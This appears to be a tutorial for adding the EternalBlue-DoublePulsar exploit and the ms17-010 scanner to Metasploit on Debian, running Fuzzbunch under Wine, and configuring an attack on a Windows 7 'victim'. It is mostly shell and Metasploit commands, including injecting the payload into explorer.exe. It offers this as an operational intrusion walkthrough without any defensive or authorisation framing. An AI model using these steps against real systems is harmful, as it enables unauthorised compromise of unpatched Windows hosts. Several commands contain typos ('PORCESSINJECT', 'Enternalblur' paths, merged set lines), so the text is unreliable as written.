Table of Contents
- Step 1:
- Step 2:
- Step 3:
- Step 4:
This tutorial will cover how to add Eternalblue-Doublepulsar to Metasploit framework on any Debian based distro. As well as run the Fuzzbunch framework through wine.
Debian based distro
Will the target fall victim?
We will want to check to see if the target victim is vulnerable. To do this we will need to add a module to Metasploit. Specifically we want ms17010 which we can find on exploit db. Download the file and move it into Metasploits scanner module.
cp *.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/smb/smb_ms_17_010.rb
Now start up Metasploit and lets test everything out.
Let's make sure our new module loaded.
Now use the module by entering the following.
There will be a few requirements for this to work. To list them all enter the following.
Here we really just need to set the value of RHOSTS.
set RHOSTS <IP address or addresses>
If the machine is likely vulnerable you will see something like this.
[!] 192.168.0.100:445 -Host is likely VULNERABLE to MS17-010!
The next step it to clone Eternalblue-Doublepulsar-Metasploit from github. We can add it to Metasploits path like we did before by adding directly to Metasploit. However here we will add it the prefered way.
Metasploit prefers external modules to be placed in .msf4/modules found in your root directory. We will need to make a few directories for our purpose such as exploits/windows.
Clone Enternalblue-Doublepulsar-Metasploit into this directory.
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Change into Eternalblue-Doublepulsar-Metasploit.
Now copy eternalbluedoublepulsar.rb to the appropriate directory.
cp eternalblue_doublepulsar.rb /root/.msf4/modules/exploits/windows/smb/
We need to install wine because Fuzzbunch was written for Windows.
As always we begin with update
Install Wine and other Wine tools
apt install wine winbind winetricks
We need to add x32 because fuzzbunch was written for Windows Xp.
dpkg --add-architecture i386
Update and install Wine32
apt-get update && apt-get install wine32
Set Path variable.
Set Wine Architecture
WINEARCH=win32 wine wineboot
Add to bashrc
echo "export WINEPREFIX=$HOME/.wine" >> ~/.bashrc
With everything setup its time to exploit our victim. Begin by starting Metasploit.
Use our new module. Pro tip Tab is your friend.
We will need to set the path to Doublepulsar and Eternalblue.
set DOUBLEPULSAR ~/.msf4/modules/exploits/windows/Enternalblur-Doublepulsar-Metasploit/deps set ETERNALBLUE ~/.msf4/modules/exploits/windows/Enternalblur-Doublepulsar-Metasploit/deps
I recommend setting the process injection to explorer.exe
set PORCESSINJECT explorer.exe
Set RHOST to the victim's IPaddress.
set RHOST <>
We want to make sure we are targeting the right version of Windows.
We are attacking Windows 7 so enter the appropriate corresponding number
set target <>